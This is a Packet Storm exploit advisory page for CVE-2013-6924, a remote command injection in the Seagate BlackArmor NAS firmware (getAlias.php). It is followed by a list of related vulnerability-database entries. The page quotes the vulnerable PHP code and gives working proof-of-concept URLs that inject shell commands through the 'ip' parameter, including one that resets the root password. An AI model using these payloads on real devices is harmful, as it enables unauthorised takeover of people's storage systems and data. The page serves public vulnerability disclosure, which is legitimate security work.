Lucene search
JeroenPACKETSTORM:124688HistoryJan 06, 2014 - 12:00 a.m.
Seagate BlackArmor NAS sg2000-2000.1331 Remote Command Execution
2014-01-0600:00:00
Jeroen
packetstormsecurity.com
46
0.03 Low
EPSS
Percentile
90.9%
`# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/
# Software Link:
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
>
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6924
#
## Description:
#
# The file getAlias.php located in /backupmgt has the following lines:
#
# $ipAddress = $_GET["ip";
# if ($ipAddress != "") {
# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
# ..
# ..
# }
#
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
#
## Proof of Concept:
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
command here>;
#
## Example to change the root password to 'mypassword':
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;
`
Related
zdt
zdt
Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution
2014-01-06 00:00:00
cvelist
cvelist
CVE-2013-6924
2017-10-11 12:00:00
seebug
seebug
Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution
2014-07-01 00:00:00
Seagate BlackArmor NAS sg2000-2000.1331θΏη¨δ»£η ζ§θ‘ζΌζ΄
2014-01-06 00:00:00
exploitpack
exploitpack
Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution
2014-01-06 00:00:00
cve
cve
CVE-2013-6924
2017-10-11 12:29:00
prion
prion
Design/Logic Flaw
2017-10-11 12:29:00
nvd
nvd
CVE-2013-6924
2017-10-11 12:29:00
exploitdb
exploitdb
Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution
2014-01-06 00:00:00
openvas
openvas
Seagate BlackArmor NAS Multiple Vulnerabilities
2014-01-06 00:00:00